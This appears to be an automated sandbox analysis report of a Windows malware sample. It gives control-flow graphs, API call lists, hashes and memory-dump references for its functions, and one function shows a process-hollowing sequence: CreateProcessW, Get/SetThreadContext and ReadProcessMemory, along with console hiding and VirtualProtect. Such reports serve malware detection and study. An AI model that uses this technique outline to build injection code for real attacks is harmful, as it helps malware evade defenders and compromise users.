                                                                                                                        control_flow_graph 114 42720a-427225 call 42705f 117 427228-42722c 114->117 118 427244-427251 117->118 119 42722e-427242 117->119 120 427254-427258 118->120 119->117 121 427270-42727d 120->121 122 42725a-42726e 120->122 123 427280-427284 121->123 122->120 124 427286-42729a 123->124 125 42729c-42737a call 427073 * 8 123->125 124->123 142 427391 125->142 143 42737c-427386 125->143 145 427395-4273b1 142->145 143->142 144 427388-42738f 143->144 144->145 147 4273b3-4273b5 145->147 148 4273ba 145->148 149 427734-427737 147->149 150 4273c1-4273e9 CreateProcessW 148->150 151 4273f0-427409 Wow64GetThreadContext 150->151 152 4273eb 150->152 154 427410-42742d ReadProcessMemory 151->154 155 42740b 151->155 153 4276e8-4276ec 152->153 158 427731-427733 153->158 159 4276ee-4276f2 153->159 156 427434-42743d 154->156 157 42742f 154->157 155->153 160 427464-427483 call 428286 156->160 161 42743f-42744e 156->161 157->153 158->149 162 4276f4-4276ff 159->162 163 427705-427709 159->163 173 427485 160->173 174 42748a-4274ab call 4283a0 160->174 161->160 166 427450-427456 call 4281f1 161->166 162->163 164 427711-427715 163->164 165 42770b 163->165 169 427717 164->169 170 42771d-427721 164->170 165->164 177 42745b-42745d 166->177 169->170 175 427723-427728 call 4281f1 170->175 176 42772d-42772f 170->176 173->153 182 4274f0-427510 call 4283a0 174->182 183 4274ad-4274b4 174->183 175->176 176->149 177->160 180 42745f 177->180 180->153 190 427512 182->190 191 427517-42752c call 4270da 182->191 184 4274b6-4274e2 call 4283a0 183->184 185 4274eb 183->185 193 4274e4 184->193 194 4274e9 184->194 185->153 190->153 196 427535-42753f 191->196 193->153 194->182 197 427571-427575 196->197 198 427541-42756f call 4270da 196->198 200 427655-427671 call 42803f 197->200 201 42757b-427589 197->201 198->196 208 427673 200->208 209 427675-427696 Wow64SetThreadContext 200->209 201->200 204 42758f-42759d 201->204 204->200 207 4275a3-4275c3 204->207 210 4275c6-4275ca 207->210 208->153 211 42769a-4276a4 call 428140 209->211 212 427698 209->212 210->200 213 4275d0-4275e5 210->213 221 4276a6 211->221 222 4276a8-4276ac 211->222 212->153 215 4275f7-4275fb 213->215 216 427638-427650 215->216 217 4275fd-427609 215->217 216->210 219 427636 217->219 220 42760b-427634 217->220 219->215 220->219 221->153 224 4276b4-4276b8 222->224 225 4276ae 222->225 226 4276c0-4276c4 224->226 227 4276ba 224->227 225->224 228 4276c6 226->228 229 4276cc-4276d0 226->229 227->226 228->229 230 4276d2-4276d7 call 4281f1 229->230 231 4276dc-4276e2 229->231 230->231 231->150 231->153
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        • Opcode ID: 40f3fe44299ea80f792d4fca6f3b64c003c04c96a2fcb0d3d303e0b792b17f87
                                                                                                                        • Instruction ID: 292bb31f1eaa4ec2e32b159638772cf550375361f8e0b647506156eac6cf7339
                                                                                                                        • Opcode Fuzzy Hash: 40f3fe44299ea80f792d4fca6f3b64c003c04c96a2fcb0d3d303e0b792b17f87
                                                                                                                        • Instruction Fuzzy Hash: 0B020570E04229EFDB10DF98DD85BADBBB5BF04304F60409AE505BA291D778AE85DF18
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 233 406530-40655a GetConsoleWindow ShowWindow call 406802 236 406560-406568 233->236 237 406613-40661b 233->237 238 40656a-40657c 236->238 239 40657e-406583 236->239 238->239 240 406590-4065b4 239->240 240->240 241 4065b6-4065cc VirtualProtect 240->241 254 4065d2 call 4278b7 241->254 255 4065d2 call 427afd 241->255 242 4065d4-4065ef call 4088c5 call 402550 242->237 247 4065f1-406610 call 402470 call 402770 call 4088c5 242->247 247->237 254->242 255->242
                                                                                                                        APIs
                                                                                                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 0040653C
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00406543
                                                                                                                        • VirtualProtect.KERNELBASE(00427000,00001729,00000040,?), ref: 004065C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ConsoleProtectShowVirtual
                                                                                                                        • String ID: ddser.bmp$rtertert.bmp
                                                                                                                        • API String ID: 2391285285-2540923277
                                                                                                                        • Opcode ID: 72638d85c22c584071d84d3397c85ee5957f4c028bdfad5660163c47ac352e05
                                                                                                                        • Instruction ID: 5533ad7b6d815ea9e7f499f256abecbe80a315f8a5e9fe0456232b3b021f5824
                                                                                                                        • Opcode Fuzzy Hash: 72638d85c22c584071d84d3397c85ee5957f4c028bdfad5660163c47ac352e05
                                                                                                                        • Instruction Fuzzy Hash: 3A218E72A001147BE704B6E5EC46EEB77AC9F44304709403AFD06E61C2D979AA1582AD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406585 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 294 406585-40658c 295 406590-4065b4 294->295 295->295 296 4065b6-4065cc VirtualProtect 295->296 310 4065d2 call 4278b7 296->310 311 4065d2 call 427afd 296->311 297 4065d4-4065ef call 4088c5 call 402550 302 4065f1-406610 call 402470 call 402770 call 4088c5 297->302 303 406613-40661b 297->303 302->303 310->297 311->297
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(00427000,00001729,00000040,?), ref: 004065C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: ddser.bmp$rtertert.bmp
                                                                                                                        • API String ID: 544645111-2540923277
                                                                                                                        • Opcode ID: 2e9baf719afcd4d7d00904d8b767bdb1639e99e9f24d12708b9daea56197193e
                                                                                                                        • Instruction ID: d9090c95b277c2e89f7492e99f46fea6d4988c495b3e953c697a3efb723fd0bd
                                                                                                                        • Opcode Fuzzy Hash: 2e9baf719afcd4d7d00904d8b767bdb1639e99e9f24d12708b9daea56197193e
                                                                                                                        • Instruction Fuzzy Hash: 5D012D729051147ADB01E6E1EC41FDA736CEF44318F04007AFD58E60C2E974962982AD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00407237 Relevance: 4.5, APIs: 3, Instructions: 28COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 312 407237-40723d 313 40724c-40724f call 40b126 312->313 315 407254-407257 313->315 316 407259-40725a 315->316 317 40723f-40724a call 40dbc6 315->317 317->313 320 40725b-407285 call 4087bd call 4088f0 317->320
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040724F
                                                                                                                          • Part of subcall function 0040B126: __FF_MSGBANNER.LIBCMT ref: 0040B13D
                                                                                                                          • Part of subcall function 0040B126: __NMSG_WRITE.LIBCMT ref: 0040B144
                                                                                                                          • Part of subcall function 0040B126: RtlAllocateHeap.NTDLL(00700000,00000000,00000001,00000001,?,?,?,0040887C,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 0040B169
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040726B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00407280
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3074076210-0
                                                                                                                        • Opcode ID: f04ba7a8984f1f21f523cc1750a76bf2a3c7fc086811616a2623e9b0881a8df6
                                                                                                                        • Instruction ID: 4a19ba3157411f2e882fe8c47bed24adf70bbf0186f88495df70ae319611b7bc
                                                                                                                        • Opcode Fuzzy Hash: f04ba7a8984f1f21f523cc1750a76bf2a3c7fc086811616a2623e9b0881a8df6
                                                                                                                        • Instruction Fuzzy Hash: 38E0E574900209AACB00FB95CD119EE7B78AF00354F90447FF900B11C2DF78E64496AE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00427838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004277DA: GetSystemInfo.KERNELBASE(?), ref: 004277F7
                                                                                                                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0042789D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocInfoNumaSystemVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 449148690-0
                                                                                                                        • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                        • Instruction ID: fafa27d47f1174c23830fe57b52650df233d4b27826d611afb50e2e85d7acb1c
                                                                                                                        • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                        • Instruction Fuzzy Hash: 01F0F470F48368BAEB107BF2680B75DB668EF01349F90459B7640A6182DA7C5604866D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0042773A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 415 42773a-427781 call 42705f call 427073 * 2 VirtualAlloc 422 427783-427786 415->422 423 427788-427790 415->423 422->423 424 427792-42779f 423->424 425 4277d5-4277d9 423->425 426 4277a2-4277a6 424->426 427 4277a8-4277bc 426->427 428 4277be-4277cf 426->428 427->426 428->425
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00427777
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                        • Instruction ID: f31d05e8a6d5a293455cfcefd2885083de6f1c959b2b6ba358b10f4554656cb2
                                                                                                                        • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                        • Instruction Fuzzy Hash: 42113670E44228AFEB00EBA8DC49BAEFBB4EB04304F608496E900B7291D2755A448B94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00419B9E Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _memset.LIBCMT ref: 00419BD4
                                                                                                                        • _TranslateName.LIBCMT ref: 00419C1F
                                                                                                                        • _TranslateName.LIBCMT ref: 00419C6A
                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 00419CB7
                                                                                                                          • Part of subcall function 0040D4A3: _wcsnlen.LIBCMT ref: 0040D4E4
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00419D0B
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00419D1E
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 00419D71
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00419D88
                                                                                                                        • __itow_s.LIBCMT ref: 00419D9A
                                                                                                                          • Part of subcall function 0041CE1A: _xtow_s@20.LIBCMT ref: 0041CE3C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoNameTranslateValid$CodeDefaultPageUser__getptd_noexit__itow_s_memset_wcsnlen_xtow_s@20
                                                                                                                        • String ID: THB
                                                                                                                        • API String ID: 1039567946-881244879
                                                                                                                        • Opcode ID: 498b865e0c843766044d1fce14aa74ddbd613529812661b25d6193daecca8108
                                                                                                                        • Instruction ID: 0f69aee4629116af9a05091ab56b8000b62e2d4b8fd21250ef6d9dac0c4e465a
                                                                                                                        • Opcode Fuzzy Hash: 498b865e0c843766044d1fce14aa74ddbd613529812661b25d6193daecca8108
                                                                                                                        • Instruction Fuzzy Hash: C8517E71A002199ADB10EFA5DC91BFF77B8AF04704F05042BE945E7281E7799E84CBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00419A89 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcscmp.LIBCMT ref: 00419AA0
                                                                                                                        • _wcscmp.LIBCMT ref: 00419AB1
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00419CE3,?,00000000), ref: 00419ACD
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00419CE3,?,00000000), ref: 00419AF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                        • Opcode ID: 0d3cce2d8418797460a0d0b60f791231dbd3b79460bbec0f6d1dd6e13270e13c
                                                                                                                        • Instruction ID: 82f73ddc667379e990f1750b54f51f202793062cfaa82b9960093a618dc814a9
                                                                                                                        • Opcode Fuzzy Hash: 0d3cce2d8418797460a0d0b60f791231dbd3b79460bbec0f6d1dd6e13270e13c
                                                                                                                        • Instruction Fuzzy Hash: CC01AD31204215AAEB20DE16EC51FD737D8EF047A4B088027F908DA190E7A8EEC4879C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041976E Relevance: 6.2, APIs: 4, Instructions: 173COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 004197C7
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 00419814
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 004198C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale$__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1862418609-0
                                                                                                                        • Opcode ID: 130bcfcde72d26cb531dc9744c7a3a6c44b22305e0d00254d6708e9606cb4827
                                                                                                                        • Instruction ID: 434fc6184cf633b4ef41587483370f3f5e9e4864e40cab67f9712fb763d73883
                                                                                                                        • Opcode Fuzzy Hash: 130bcfcde72d26cb531dc9744c7a3a6c44b22305e0d00254d6708e9606cb4827
                                                                                                                        • Instruction Fuzzy Hash: 7B51CEB15202129FEB289F25C9A2BE777A8EF01314F14807FE80486295E778DDC4CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041966E Relevance: 3.0, APIs: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _GetPrimaryLen.LIBCMT ref: 004196B9
                                                                                                                        • EnumSystemLocalesW.KERNEL32(0041976E,00000001,000000A0,?,?,00419C8C,00000000,?,?,?,?,?,00000055), ref: 004196C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesPrimarySystem__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1605451767-0
                                                                                                                        • Opcode ID: 3bb30db2ef1d526fd1d5d6bec617feceee6898feec64f8f3229eb19ccdd60e5d
                                                                                                                        • Instruction ID: 95b7eb465541007cd52e0dcbbef15b0a39f70f74404222b4d4f99a2491b3b091
                                                                                                                        • Opcode Fuzzy Hash: 3bb30db2ef1d526fd1d5d6bec617feceee6898feec64f8f3229eb19ccdd60e5d
                                                                                                                        • Instruction Fuzzy Hash: 1C018432550307DEE720AF35D509BA6BBE0EF00715F10492FE455961D1D7BD6894CB5C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00419B36 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00419930,00000000,00000000,?), ref: 00419B60
                                                                                                                        • _GetPrimaryLen.LIBCMT ref: 00419B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocalePrimary__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3580725100-0
                                                                                                                        • Opcode ID: 23e04a040d014c38e04e34f044347def2a89ed91a59f772837733b81ce5752ac
                                                                                                                        • Instruction ID: 511fc75ee5418908e0dc47367957947d5d5876091e72ca5d96b98d8d5db6f4ed
                                                                                                                        • Opcode Fuzzy Hash: 23e04a040d014c38e04e34f044347def2a89ed91a59f772837733b81ce5752ac
                                                                                                                        • Instruction Fuzzy Hash: D4F0F672A24110BAEF145631DC55FEE7698FB40754F10403BE905A2181EA7CBD8086A8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004196EB Relevance: 3.0, APIs: 2, Instructions: 31COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _GetPrimaryLen.LIBCMT ref: 0041971D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00419961,00000001,?,?,00419C56,004124A7,?,?,00000055,?,?,004124A7,?,?,?), ref: 00419730
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesPrimarySystem__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1605451767-0
                                                                                                                        • Opcode ID: 3279a64362fc5fbdd227c4b0dc2d9144a5606f94edbfd9555c99a191eefdfeb6
                                                                                                                        • Instruction ID: 3091879ea61ce8d73b87c087e928a090a2300d9e2469dd7eeb4f9252f5dc3132
                                                                                                                        • Opcode Fuzzy Hash: 3279a64362fc5fbdd227c4b0dc2d9144a5606f94edbfd9555c99a191eefdfeb6
                                                                                                                        • Instruction Fuzzy Hash: 27F08271564305EAD7206E35EC55BE17B94DF05750F10442AF859861D2C6B95C808668
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B8AE Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040E2C3,?,?,?,00000001), ref: 0040B8B3
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0040B8BC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
